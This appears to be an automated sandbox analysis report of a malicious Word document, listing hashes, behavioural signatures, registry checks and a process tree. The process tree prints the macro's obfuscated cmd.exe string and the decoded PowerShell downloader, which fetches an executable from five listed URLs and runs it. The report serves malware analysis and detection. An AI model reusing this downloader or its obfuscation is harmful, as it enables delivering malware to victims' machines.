Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
24-05-2024 14:58
Behavioral task
behavioral1
Sample
6ee7ca73b2a8f7ebbdc702a584a6ab4a_JaffaCakes118.doc
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
6ee7ca73b2a8f7ebbdc702a584a6ab4a_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
6ee7ca73b2a8f7ebbdc702a584a6ab4a_JaffaCakes118.doc
-
Size
132KB
-
MD5
6ee7ca73b2a8f7ebbdc702a584a6ab4a
-
SHA1
7823d19d694e0d87f328cab903a1ab9631bfd327
-
SHA256
561a3a5269e77e0789555a8791fe2d0b51f4e43607fc58ad02c60cf3aad8b5e1
-
SHA512
3f20695422d87696b7f6c2d04a590c91a7d31e08aca1998df10d9a2c70456a9c9a43fb8d182646a5ee292ed3cb9a5a9db90221414a73d448af470e1ce8904bbe
-
SSDEEP
3072:A8GhDS0o9zTGOZD6EbzCd3WiWCAWcWvfxa:eoUOZDlbe3WiWCAWcWvfxa
Malware Config
Extracted
http://levifca.com/y0tYhnWQ
http://mfpvision.com/yAkPNiSmm6
http://haganelectronics.rubickdesigns.com/C96xSAAy2q
http://catairdrones.com/sMQ0n8nNun
http://radio312.com/mp0NHN4cHX
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4544 3088 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 30 4712 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3088 WINWORD.EXE 3088 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4712 powershell.exe 4712 powershell.exe 4712 powershell.exe 2636 powershell.exe 2636 powershell.exe 2636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4712 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3088 WINWORD.EXE 3088 WINWORD.EXE 3088 WINWORD.EXE 3088 WINWORD.EXE 3088 WINWORD.EXE 3088 WINWORD.EXE 3088 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WINWORD.EXEcmd.exepowershell.exedescription pid process target process PID 3088 wrote to memory of 4544 3088 WINWORD.EXE cmd.exe PID 3088 wrote to memory of 4544 3088 WINWORD.EXE cmd.exe PID 4544 wrote to memory of 4712 4544 cmd.exe powershell.exe PID 4544 wrote to memory of 4712 4544 cmd.exe powershell.exe PID 4712 wrote to memory of 2636 4712 powershell.exe powershell.exe PID 4712 wrote to memory of 2636 4712 powershell.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6ee7ca73b2a8f7ebbdc702a584a6ab4a_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /V:O/C"set lj=;'afd'=dww$}}{hctac}};kaerb;'boU'=OFK$;vWd$ metI-ekovnI{ )00008 eg- htgnel.)vWd$ metI-teG(( fI;'fBW'=fSP$;)vWd$ ,abU$(eliFdaolnwoD.dam${yrt{)tdB$ ni abU$(hcaerof;'exe.'+Ihv$+'\'+pmet:vne$=vWd$;'BLv'=zqo$;'391' = Ihv$;'UDL'=DqS$;)'@'(tilpS.'XHc4NHN0pm/moc.213oidar//:ptth@nuNn8n0QMs/moc.senordriatac//:ptth@q2yAASx69C/moc.sngisedkcibur.scinortcelenagah//:ptth@6mmSiNPkAy/moc.noisivpfm//:ptth@QWnhYt0y/moc.acfivel//:ptth'=tdB$;tneilCbeW.teN tcejbo-wen=dam$;'kaF'=zYv$ llehsrewop&&for /L %9 in (475;-1;0)do set Yfw=!Yfw!!lj:~%9,1!&&if %9==0 powershell "!Yfw:*Yfw!=!" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "powershell $vYz='Fak';$mad=new-object Net.WebClient;$Bdt='http://levifca.com/y0tYhnWQ@http://mfpvision.com/yAkPNiSmm6@http://haganelectronics.rubickdesigns.com/C96xSAAy2q@http://catairdrones.com/sMQ0n8nNun@http://radio312.com/mp0NHN4cHX'.Split('@');$SqD='LDU';$vhI = '193';$oqz='vLB';$dWv=$env:temp+'\'+$vhI+'.exe';foreach($Uba in $Bdt){try{$mad.DownloadFile($Uba, $dWv);$PSf='WBf';If ((Get-Item $dWv).length -ge 80000) {Invoke-Item $dWv;$KFO='Uob';break;}}catch{}}$wwd='dfa';"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =Fak4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ae343a0c544713797d1582baed41cd6c
SHA1170efb0fbebe36a6f605c6cfd664525f1158a58e
SHA256dbc33d6f061613aaf9ec0a3472b37ec709ac168cde70c7b48c5807765f3ed292
SHA51268afed158e066e67d6526627ceda320e1702779b95b8fe597ef573c1be7bcef0dc19f0e6fc17e8103c16fb0aa77d83e06e5f64435100d60193e3ee72e9bbc8b5
-
C:\Users\Admin\AppData\Local\Temp\TCDAE63.tmp\gb.xslFilesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onw5d0ob.4tw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/3088-9-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-35-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-7-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-6-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-8-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-0-0x00007FFF45110000-0x00007FFF45120000-memory.dmpFilesize
64KB
-
memory/3088-10-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-11-0x00007FFF42B60000-0x00007FFF42B70000-memory.dmpFilesize
64KB
-
memory/3088-12-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-14-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-15-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-17-0x00007FFF42B60000-0x00007FFF42B70000-memory.dmpFilesize
64KB
-
memory/3088-13-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-16-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-19-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-18-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-30-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-5-0x00007FFF45110000-0x00007FFF45120000-memory.dmpFilesize
64KB
-
memory/3088-39-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-571-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-3-0x00007FFF45110000-0x00007FFF45120000-memory.dmpFilesize
64KB
-
memory/3088-4-0x00007FFF8512D000-0x00007FFF8512E000-memory.dmpFilesize
4KB
-
memory/3088-1-0x00007FFF45110000-0x00007FFF45120000-memory.dmpFilesize
64KB
-
memory/3088-2-0x00007FFF45110000-0x00007FFF45120000-memory.dmpFilesize
64KB
-
memory/3088-522-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-547-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-548-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-549-0x00007FFF85090000-0x00007FFF85285000-memory.dmpFilesize
2.0MB
-
memory/3088-567-0x00007FFF45110000-0x00007FFF45120000-memory.dmpFilesize
64KB
-
memory/3088-570-0x00007FFF45110000-0x00007FFF45120000-memory.dmpFilesize
64KB
-
memory/3088-569-0x00007FFF45110000-0x00007FFF45120000-memory.dmpFilesize
64KB
-
memory/3088-568-0x00007FFF45110000-0x00007FFF45120000-memory.dmpFilesize
64KB
-
memory/4712-45-0x00000181153B0000-0x00000181153D2000-memory.dmpFilesize
136KB